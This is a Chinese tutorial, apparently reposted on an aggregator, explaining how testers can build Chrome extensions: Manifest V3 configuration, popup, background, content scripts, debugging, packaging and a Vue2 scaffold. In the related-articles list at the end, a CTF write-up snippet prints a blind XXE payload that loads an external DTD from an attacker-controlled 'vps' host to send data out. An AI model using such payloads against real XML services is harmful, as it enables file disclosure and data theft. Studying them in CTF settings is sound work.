打开新世界大门,测试人可以用Chrome插件干什么?

news2025/1/14 18:28:29

什么是Chrome插件

这篇文章所说的Chrome插件,也就是我们通常说的Chrome扩展 (Chrome Extension),是一个用Web技术开发、用来增强浏览器功能的软件,它其实就是一个由 HTML、CSS、JS、图片等资源组成的一个 .crx 后缀的压缩包。

让我们来看看官方解释:

Chrome Extension 是一个小的软件程序,它可以用来定义浏览器的浏览体验,让用户可以根据个人需求或者偏好定制 Chrome 浏览器的功能和行为,主要使用的技术栈是 HTML、Javascript 和 CSS。

简单来说,就是:利用前端的技术栈,来定制浏览器的功能,改善用户体验。

只要你会写 JS、HTML、CSS,你就能开发 Chrome 插件!!!

Chrome插件能干什么

利用Chrome浏览器提供的已有功能和和各种API,进行功能组合,从而增强浏览器网页的功能,改善浏览器体验,轻松实现属于自己的 “定制版” 浏览器。

通过Chrome插件,你可以实现包括但不限于以下相关功能:

  • 书签控制
  • 下载控制
  • 窗口控制
  • 标签控制
  • 网络请求控制
  • 各类事件监听
  • 自定义原生菜单
  • 完善的通信机制

测试人员能用Chrome插件干什么?

下面简单介绍下作为测试人员,我基于业务开发的一个Chrome插件:

图片

这是一个多个角色一键切换登录系统的Chrome插件,在业务测试的过程中,测试人员可以非常方便的在各个角色之间来回切换测试,不需要再用文档去记录各种角色、各种账号,大大提升了测试效率。

另外,对于PM、UI走查,以及开发联调都提供了极大的方便。

也就是说,只要你测试的业务形态是web项目,你就可以基于Chrome插件的各种能力,对web项目进行各种操作,以达到提升效率的目的。

Chrome插件核心概念

图片

manifest.json

manifest.json是一个JSON格式的清单文件,是插件必不可少的文件,用来配置所有和插件相关的配置,提供重要信息。

manifest.json 文件必须放在根目录下。

目前,Chrome官方推出的manifest最新版本是V3。

建议使用最新的V3版本进行开发,V2版本2023年开始就不维护了。

下面给出V3版本的一些常用配置:

{
   // 清单文件的版本,这个必须写,目前最新版本是3
   "manifest_version": 3,
   // 插件的名称,必须配置
   "name": "demo",
   // 插件的版本,必须配置
   "version": "1.0.0",
   // 插件描述
   "description": "Chrome扩展demo",
   // 图标
   "icons":
   {
     "16": "img/icon.png",
     "48": "img/icon.png",
     "128": "img/icon.png"
   },
   // 会一直常驻的后台JS或后台页面
   "background":
   {
     // 如果需要 background,则下面的配置必须要有,指定后台运行的脚本
     "service_worker": "background.js"
   },
   // 浏览器右上角图标等,对应 v2 版本的 browser_action、page_action 设置
   "action":
   {
     // 图标
     "default_icon": {
      "16": "images/favicon.png",
      "32": "images/favicon.png",
      "48": "images/favicon.png",
      "128": "images/favicon.png"
    },
     // 图标悬停时的标题,可选
     "default_title": "这是一个示例Chrome插件",
     "default_popup": "popup.html"
   },
   // 需要直接注入页面的JS
   "content_scripts":
   [
     {
       //"matches": ["http://*/*", "https://*/*"],
       // "<all_urls>" 表示匹配所有地址
       "matches": ["<all_urls>"],
       // 多个JS按顺序注入
       "js": ["js/jquery-1.8.3.js", "js/content-script.js"],
       // JS的注入可以随便一点,但是CSS的注意就要千万小心了,因为一不小心就可能影响全局样式
       "css": ["css/custom.css"],
       // 代码注入的时间,可选值: "document_start", "document_end", or "document_idle",最后一个表示页面空闲时,默认document_idle
       "run_at": "document_start"
     },
     // 这里仅仅是为了演示content-script可以配置多个规则
     {
       "matches": ["*://*/*.png", "*://*/*.jpg", "*://*/*.gif", "*://*/*.bmp"],
       "js": ["js/show-image-content-size.js"]
     }
   ],
   // 权限申请,可以用来指定使用 Chrome 插件的那些功能
   "permissions":
   [
     "contextMenus", // 右键菜单
     "cookies", // cookie
     "tabs", // 标签
     "notifications", // 通知
     "webRequest", // web请求
     "webRequestBlocking",
     "storage", // 插件本地存储
     "scripting" // 允许向页面注入脚本执行
   ],
  // 网站权限申请,可以通过 executeScript 或者 insertCSS 访问的网站
  "host_permissions": [
    "http://*/*",
    "https://*/*"
  ],
   // 普通页面能够直接访问的插件资源列表,如果不设置是无法直接访问的
   // 扩展通常使用此功能来公开需要在网页中加载的图像或其他资产,但扩展包中包含的任何资产都可以通过网络访问
   "web_accessible_resources": ["js/inject.js"],
   // 插件主页,这个很重要,不要浪费了这个免费广告位
   "homepage_url": "https://www.baidu.com",
   // 覆盖浏览器默认页面
   "chrome_url_overrides":
   {
     // 覆盖浏览器默认的新标签页
     "newtab": "newtab.html"
   },
   // 允许用户通过提供选项页面来自定义扩展的行为。用户可以通过右键单击工具栏中的扩展图标然后选择选项来查看扩展的选项,或者导航到位于 chrome://extensions 的扩展管理页面,找到所需的扩展,单击详细信息,然后选择选项链接
   // Chrome40以前的插件配置页写法
   "options_page": "options.html",
   // Chrome40以后的插件配置页写法,如果2个都写,新版Chrome只认后面这一个
   "options_ui":
   {
     "page": "options.html",
     // 添加一些默认的样式,推荐使用
     "chrome_style": true
   },
   // 向地址栏注册一个关键字以提供搜索建议,只能设置一个关键字
   "omnibox": { "keyword" : "go" },
   // 默认语言
   "default_locale": "zh_CN",
   // devtools页面入口,只能指向一个HTML文件,不能是JS文件
   "devtools_page": "devtools.html"}

更多配置请参考:manifest.json 配置

popup

popup 是点击扩展图标时打开的一个小窗口网页,焦点离开网页就立即关闭,一般用来做一些临时性的交互。

比如:

在这里插入图片描述

popup可以包含任意你想要的HTML内容,并且会自适应大小。

在 manifest.json 文件中,可以通过 default_popup 字段来指定 popup 页面,也可以调用 setPopup() 方法。

下面给出在 manifest.json 中如何进行配置:

"action":{
   ...,
   // 指定 popup 页面
   "default_popup": "popup.html",
   // 图标
   "default_icon": {
      "16": "images/favicon.png",
      "32": "images/favicon.png",
      "48": "images/favicon.png",
      "128": "images/favicon.png"
   },
   // 图标悬停时的标题,可选
   "default_title": "这是一个示例Chrome插件",    
   ...},

popup页面的生命周期一般很短,需要长时间运行的代码千万不要写在popup里面。

background

background 是一个常驻的页面,它的生命周期是插件中所有类型页面中最长的,它随着浏览器的打开而打开,随着浏览器的关闭而关闭,所以通常把需要一直运行的、启动就运行的、全局的代码放在 background 里面。

background 的权限非常高,几乎可以调用所有的 Chrome 扩展 API(除了 devtools),而且它可以无限制跨域,也就是可以跨域访问任何网站而无需要求对方设置 CORS。

在 manifest.json 文件中,可以通过 service_worker 字段指定 background:

"background":{
   // 如果需要 background,则下面的配置必须要有,指定后台运行的脚本
   "service_worker": "background.js"},

background 页面是看不到的,我们只能调试它的代码。

content-scripts

content-scripts 是 Chrome 插件中向页面注入脚本的一种形式。

通过 content-scripts 我们可以以配置的方式轻松向指定页面注入 JS 和 CSS,实现一些脚本执行和 CSS 定制。

在 manifest.json 文件中,可以通过 content-scripts 字段配置:

"content_scripts":
   [
     {
       //"matches": ["http://*/*", "https://*/*"],
       // "<all_urls>" 表示匹配所有地址
       "matches": ["<all_urls>"],
       // 多个JS按顺序注入
       "js": ["js/jquery-1.8.3.js", "js/content-script.js"],
       // JS的注入可以随便一点,但是CSS的注意就要千万小心了,因为一不小心就可能影响全局样式
       "css": ["css/custom.css"],
       // 代码注入的时间,可选值: "document_start", "document_end", or "document_idle",最后一个表示页面空闲时,默认document_idle
       "run_at": "document_start"
     }
   ],

除了 content-scripts,另外还有一种注入的方式我们称之为动态注入,也就是在插件运行时,在任何你想要注入的时候进行注入,而不用提前指定。

通过 chrome.scripting.executeScript 来执行脚本,从而实现访问 web 页面的 DOM。

使用 chrome.scripting.executeScript 方式注入脚本,必须在 manifest.json 文件中指定 permission 字段进行权限申请。

"permissions": ["tabs", "scripting"]

content-scripts 和动态注入这两种方式与原始页面共享 DOM,但是不共享 JS,如要访问页面 JS(例如某个 JS 变量),只能通过 injected js 来实现。

什么是 injected js?

Injected js 是通过 DOM 操作的方式向页面注入的一种 JS。

比如下面的代码就是一段 Injected js:

/ 向页面注入JSfunction injectCustomJs(jsPath){
    jsPath = jsPath || 'js/inject.js';
    var temp = document.createElement('script');
    temp.setAttribute('type', 'text/javascript');
    // 获得的地址类似:chrome-extension://ihcokhadfjfchaeagdoclpnjdiokfakg/js/inject.js
    temp.src = chrome.extension.getURL(jsPath);
    temp.onload = function()
    {
    // 放在页面不好看,执行完后移除掉
    this.parentNode.removeChild(this);
    };
    document.head.appendChild(temp);}

使用 injected js 也需要申请 permissions:

"permissions": ["tabs", "scripting"]

上面几种 js 的对比:

在这里插入图片描述

homepage_url

用来设置插件的主页【一个免费的广告位~😄】

在 manifest.json 中配置 homepage_url 字段来设置主页:

"homepage_url": "http://localhost:8080/",

配置后,右键单击插件图标,点击插件名称后可以跳转到配置的主页。

图片

标题Chrome插件开发

技能储备

  • JS
  • HTML
  • CSS

开发

只要一个 manifest.json 文件和一个 html 文件,就可以开发一个 Chrome 插件。

最简单的 manifest.json:

{
  // manifest 版本配置
  "manifest_version": 3,
  // 插件名称配置
  "name": "Chrome Extension Demo",
  // 插件版本配置
  "version": "1.0.0"}

manifest_version、name、version 是开发一个 Chrome 插件必不可少的配置项。

你可以根据自己的开发需求,配置 manifest.json。

调试

Popup 页面调试

右键单击 Chrome 插件图标,点击审查元素内容,即可打开 Popup 页面调试界面,与 Chrome 浏览器的 Devtools 一样。

图片

background.js 调试

如果你开发中用到了 background.js,可以通过以下方式记性调试:

打开 Chrome 扩展程序页面,点击你的 Chrome 插件里的 Service Worker,即可打开 background.js 的调试页面。

图片

图片

content-script 调试

与普通 web 页面调试一样,使用浏览器的开发者工具调试。

打包发布

通常,我们可以通过两种方式来使用Chrome插件:

通过 .crx 应用包的形式安装使用(Chrome 应用商店直接下载 or 第三方下载)

通过开发者模式加载使用

所以,我们自己开发的Chrome插件,也可以通过两种方式来发布使用:

1. 直接将开发完成的文件夹分享给别人导入使用

如果你用了前端的一些框架,比如 vue,你可以通过这些框架的打包功能进行打包;如果你没有用任何框架,可以直接导入源代码所在的目录。

可以是任何一个文件夹,只要根目录包含 manifest.json 文件,就可以作为 Chrome 插件导入使用。

图片

使用这种方式,Chrome 扩展程序管理页面必须打开开发者模式!

2. 打包成 .crx 文件,发布到应用市场供他人使用

可以在插件管理页通过打包扩展程序进行打包。

图片

打包后会生成一个 .crx 文件,然后你就可以把这个 .crx 文件发布到 Chrome 应用商店啦~~

使用这种方式,发布前,你需要做以下准备:
1.注册一个 Google 账号
2.注册为开发者

Chrome插件脚手架项目

考虑到一些同学可能对如何去搭建一个前端项目不太熟悉,或者在开发插件的过程中,不知道如何配置 Chrome 插件的热更新加载,以达到修改代码实时加载的目的。

下面提供一个脚手架项目,可以让你只关注页面和功能开发,不需要关注具体怎么配置项目。

项目地址:Chrome 插件脚手架项目

该项目使用的技术栈:

Vue2:https://cn.vuejs.org/v2/guide/

Vue-cli4

manifest V3:https://developer.chrome.com/docs/extensions/mv3/intro/

组件库 Ant-Design-Vue(版本:1.7.8):https://1x.antdv.com/docs/vue/introduce

node js 版本 >= 12.13.0

如何使用

将项目clone到本地,然后通过开发工具打开项目(这里推荐使用VS code作为开发工具)

git clone https://github.com/enderjjPub/chrome-extension-template-vue2.git

目录结构

|- public              // 公共资源,打包后在 dist 根目录下
  |- background.js     // chrome 插件的 background.js 文件(因为 V3 版本必须放在打包后的根目录,所以放在这里,可以根据自己需要调整)
|- src                 // 开发代码相关
  |- assets/           // 静态资源相关,比如图片
  |- components/       // 公共组件
  |- content-script/   // chrome 插件的 content-script.js 文件
  |- options/          // chrome 插件的 options 页面
  |- popup/            // chrome 插件的 popup 页面
  |- manifest.json     // chrome 插件配置清单文件(V3)
  |- manifest-v2.json  // chrome 插件配置清单文件(V2),使用 V2 版本开发的,可以用这个文件替换 manifest.json
|- vue.config.js       // vue-cli 配置相关

开发

配置 manifest.json 文件

根据开发需要配置相关的配置项即可。

编写 popup 页面

有 popup 页面开发需求的可以参考这一步。

页面开发:src/popup/App 目录下的 App.vue 文件

组件或者第三方库引入:在 src/popup 目录下的 index.js 文件中引入

编写 background

有 background 开发需求的可以参考这一步。

修改 public 目录下的 background.js 文件

其他页面开发可参考步骤2(比如:options 页面等)

打包

安装依赖:

npm install

开发环境打包

支持文件修改后自动重新 build 和 chrome 插件的热更新。

npm run dev

生产环境打包

npm run build

开发环境和生产环境打包后,都会在根目录下生成一个 dist 文件夹,dist 文件夹包含以下文件:

- css/
- js/
- manifest.json
- popup.html
- options.html
- background.js
- ...

使用

直接将打包后的 dist 目录作为 Chrome 插件使用即可,具体步骤如下:

打开 Chrome 浏览器扩展程序页面 --》打开开发者模式 --》加载已解压的扩展程序 --》导入 dist 目录

参考

Chrome 扩展开发官方文档:https://developer.chrome.com/docs/extensions/mv3/

Chrome 扩展官方示例:https://developer.chrome.com/docs/extensions/mv3/samples/

Chrome 扩展开发极客系列:https://www.cnblogs.com/champagne/p/?page=2

Chrome 扩展开发全攻略:https://www.bookstack.cn/read/chrome-plugin-develop/spilt.1.8bdb1aac68bbdc44.md

如果觉得对你有帮助,欢迎留言讨论~


资源分享【这份资料必须领取~】

下方这份完整的软件测试视频学习教程已经上传CSDN官方认证的二维码,朋友们如果需要可以自行免费领取 【保证100%免费】

在这里插入图片描述

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/107192.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Android12屏下指纹解析

版权声明&#xff1a;本文为梦想全栈程序猿原创文章&#xff0c;转载请附上原文出处链接和本声明 前言&#xff1a;google官方更新了Android12的指纹架构&#xff0c;新添加了关于屏下指纹(屏下光学跟屏下超声波)的支持&#xff0c; 刚好近期要研究这个&#xff0c;想把自己的…

移动硬盘安装ubuntu系统二——启动U盘安装

一. 简介 在之前的一篇文章中记录了使用VMware Workstation给移动硬盘中安装Ubuntu系统过程&#xff0c;本篇文章简单记录使用启动盘安装 Ubuntu 20.04.5系统到移动硬盘。 二. 制作Ubuntu镜像的系统启动盘 按照官网 Install Ubuntu desktop上介绍&#xff0c;在 Windows 上可…

【Transformer】——李宏毅机器学习笔记

Transformer 前言 transformer是一个sequence-to-sequence(seq2seq) 的 model input a sequence&#xff0c;output a sequence. The output length is determined by model. 例如 语音辨识&#xff1a; 那么为什么不能把以上三种模型结合起来&#xff0c;进行语音识别呢&…

代码随想录拓展day3 922. 按奇偶排序数组II;24. 两两交换链表中的节点;234.回文链表;143.重排链表

代码随想录拓展day3 922. 按奇偶排序数组II&#xff1b;24. 两两交换链表中的节点&#xff1b;234.回文链表&#xff1b;35.搜索插入位置 数组和链表的题目。链表的操作几天没看又忘了&#xff0c;果然是要及时复习加反复复习。 922. 按奇偶排序数组II 922. 按奇偶排序数组 …

【小程序】宿主环境之通信模型和运行机制

目录 宿主环境 1. 什么是宿主环境 2. 小程序的宿主环境 通行模型 1. 通信的主体 2. 小程序的通信模型 运行机制 5. 小程序启动的过程 6. 页面渲染的过程 宿主环境 1. 什么是宿主环境 宿主环境&#xff08;host environment&#xff09;指的是程序运行所必须的依赖环…

论文笔记Point·E: A System for Generating 3D Point Clouds from Complex Prompts

之前的文本生成3D模型的方法生成一个模型需要多块GPU跑好几个小时&#xff0c;该文章提出的方法生成一个3D模型只需要单GPU1-2分钟。 该文章生成的3D模型的质量并不是当下最好的&#xff0c;但是生成速度很快&#xff0c;因此在现实中很有意义。 从文本生成3D模型的过程分为三…

Redis 对象

在 Redis底层数据结构介绍1 中我们介绍了Redis用到的所有主要数据结构&#xff0c;比如简单动态字符串&#xff08;SDS&#xff09;、双端链表、字典、压缩列表、整数集合等等。Redis并没有直接使用这些数据结构来实现键值对数据库&#xff0c;而是基于这些数据结构创建了一个对…

第7章 数据库设计和ER模型

第7章 数据库设计和ER模型 考试范围 7.1-7.7 考试题型&#xff1a;数据库设计题 考试内容&#xff1a; 掌握基本ER模型的概念与ER图的设计&#xff1b; 掌握将ER模型转换成关系模式的方法。 1、掌握基本ER模型的概念与ER图的设计 概念 E-R 模型是数据库设计中广泛使用的数…

2022-金盾信安杯

web 有来无回 考察xxe盲注 参考博客&#xff1a;https://blog.csdn.net/m0_49623330/article/details/113641498 <!ENTITY % a SYSTEM "http://vps/test.dtd"> %a; ] > 在自己服务器上编写dtd文件 <!ENTITY % dtd "<!ENTITY % hack SYSTEM ht…

零基础小白如何提高学Python的效率?

Python在所有的编成语言对小白来说是最友好的一种语言&#xff0c;简单、清晰、易学&#xff0c;但是有句话说万事开头难&#xff0c;对于很多连计算机基础都没有的伙伴来说&#xff0c;Python学习的效率极其低&#xff0c;这也导致了一部分放弃学习Python。 为了能够解决大家…

Android MAT的使用

下载与配置 MAT下载地址&#xff1a; Eclipse Memory Analyzer Open Source Project | The Eclipse Foundation JAVA 11下载地址&#xff1a; Java Downloads | Oracle 由于最新版的MAT还需要JAVA 11&#xff0c;所以还需要配置JAVA 11的环境。 JAVA 11环境配置&#xff…

ssm药店药品进销存管理系统idea maven mysql

任何系统都要遵循系统设计的基本流程&#xff0c;本系统也不例外&#xff0c;同样需要经过市场调研&#xff0c;需求分析&#xff0c;概要设计&#xff0c;详细设计&#xff0c;编码&#xff0c;测试这些步骤&#xff0c;基于JSP技术、SSM框架、B/S机构、Mysql数据库设计并实现…

【项目实战:核酸检测平台】第五章 众志诚城

本章目标 完成转运人员、接收人员、数据上传人员端 用到技术&#xff1a; EasyExcel、ElementUIPlus。lodop打印 概述 这一章要完成转运人员、接收人员、数据上传人员端的业务模块&#xff0c;从网上的资料我并没有找到相关的界面&#xff0c;没关系自己脑补就好了&#x…

React DAY05

复习&#xff1a; 1.JSX中的数据绑定 内容绑定&#xff1a;<div>{表达式}</div> 属性绑定&#xff1a;<img src{表达式}/> 样式绑定&#xff1a;<div className{表达式} style{样式对象}></div> 事件绑定&#xff1a;<button onClick{函数} …

跨境电商卖家:减少客户流失的 5 个最佳策略

关键词&#xff1a;跨境电商卖家、客户流失 跨境电商卖家获取新客户的成本可能比保留现有客户高出 25%。 这是有道理的&#xff1a;您可以花费数周时间研究如何让新客户进入您的业务&#xff0c;并投入大量时间和精力来制定完美的潜在客户生成策略&#xff0c;但如果无法留住合…

VMware创建Linux虚拟机之(五)Spark完全分布式部署教程

Hello&#xff0c;转眼间已到2022年底&#xff0c;学期末…… 总体来说&#xff0c;今年经历了很多&#xff0c;真正的成长了许多&#xff0c;成熟了许多。 只能说&#xff0c;希望&#xff0c;明天依旧美好&#xff01;&#xff01;&#xff01; &#x1f412;本篇博客使用到…

12 系统数据库和数据库工具

1. 系统数据库 Mysql数据库安装完成后会给我们初始化四个数据库&#xff1a; mysql&#xff1a;存储Mysql服务器正常运行所需要的各种信息&#xff08;市区、主从、用户、权限&#xff09;information_schema&#xff1a;提供了访问数据库元数据的各种表和视图&#xff0c;包…

SpringBoot之Redis整合

目录 在pom.xml中添加启动器 application.yml添加配置 API测试 存取字符串类型 存取哈希类型 等效操作redis 字符串类型 本人idea&#xff1a;2020.1.3 springboot&#xff1a;2.7.6 redis&#xff1a;5.0.14.1可用 在pom.xml中添加启动器 <dependency>…

北漂外卖小哥转行程序员,他说:想让家人过上更好的生活,扎心

前言&#xff1a; 对于程序员转行送外卖的新闻我们见得很多了&#xff0c;但是从一名外卖小哥转行做一名Python程序员的新闻&#xff0c;反倒见的很少&#xff0c;但是每年转行做程序员的人大有人在。 朋友16年本科毕业后就开始自己创业&#xff0c;1年后创业失败了&#xff…

SOT23-6 领夹麦克风PD OTG协议芯片

一、简介 目前主流的无线麦克风&#xff0c;或者主播麦克风等等产品&#xff0c;在无线端的技术&#xff0c;基本上就是围绕这三个方向 1、U段方案&#xff0c;这个是最古老&#xff0c;也是应用最多的方案&#xff0c;缺点就是功耗高&#xff0c;成本高 2、非标准的2.4G方案…